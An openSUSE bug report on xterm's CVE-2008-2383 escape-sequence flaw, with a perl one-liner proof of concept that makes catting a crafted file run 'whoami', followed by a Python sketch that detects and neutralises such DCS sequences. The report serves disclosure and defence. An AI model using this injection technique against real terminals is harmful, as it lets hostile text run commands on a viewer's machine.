https://bugzilla.novell.com/show_bug.cgi?id=464884

           Summary: xterm vulnerable to CVE-2008-2383
           Product: openSUSE 11.0
           Version: Final
          Platform: x86-64
        OS/Version: openSUSE 11.0
            Status: NEW
          Severity: Major
          Priority: P5 - None
         Component: X11 Applications
        AssignedTo: bnc-team-screening@forge.provo.novell.com
        ReportedBy: R.Vickers@cs.rhul.ac.uk
         QAContact: sndirsch@novell.com
          Found By: ---

One of my users pointed out that SuSE 11.0 has the bug recently reported in
Debian Linux. A user running xterm can be induced to execute hostile commands
by, for example, displaying an email message.

Demonstrate with

    perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
    cat bla.log

executes whoami command.

See http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030
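
Added example, not part of the original bug report and not xterm's code: the demonstration above is a DCS string (ESC P ... ESC \) whose body starts with "$q", a DECRQSS status request, with line breaks embedded in it. The Python sketch below flags such strings in untrusted text (mail, logs) and rewrites control bytes in caret notation before display; the function names and sample bytes are constructed for illustration, and only the 7-bit ESC forms are handled.

```python
import re

# 7-bit DCS introducer (ESC P) up to the String Terminator (ESC \) or end of input.
# Assumption: 8-bit C1 introducers are out of scope for this sketch.
DCS_RE = re.compile(rb"\x1bP(?P<body>.*?)(?:\x1b\\|\Z)", re.DOTALL)


def find_dcs(data: bytes):
    """Return one finding per DCS string found in data."""
    findings = []
    for m in DCS_RE.finditer(data):
        body = m.group("body")
        findings.append({
            "offset": m.start(),
            # "$q" marks a DECRQSS request, the sequence named in the report
            "decrqss": body.startswith(b"$q"),
            # a line break inside the request is what makes an echoed
            # reply look like typed input followed by Enter
            "has_newline": b"\n" in body or b"\r" in body,
            "body": body,
        })
    return findings


def is_suspicious(data: bytes) -> bool:
    """True if data holds a DECRQSS request with an embedded line break."""
    return any(f["decrqss"] and f["has_newline"] for f in find_dcs(data))


def neutralize(data: bytes) -> bytes:
    """Rewrite control bytes in caret notation (like cat -v) so the
    terminal prints them instead of interpreting them."""
    out = bytearray()
    for b in data:
        if b in (0x09, 0x0A) or (b >= 0x20 and b != 0x7F):
            out.append(b)  # tab, newline, printable ASCII, UTF-8 bytes
        else:
            out += b"^" + bytes([b ^ 0x40])  # ESC becomes "^["
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample: a mail-like header followed by the page's sequence
    sample = b"From: someone\n\x1bP$q\nwhoami\n\x1b\\tail\n"
    for finding in find_dcs(sample):
        print(finding)
    print(neutralize(sample).decode())
```

Viewing the file through neutralize(), or through cat -v, shows the sequence as text rather than sending it to the terminal.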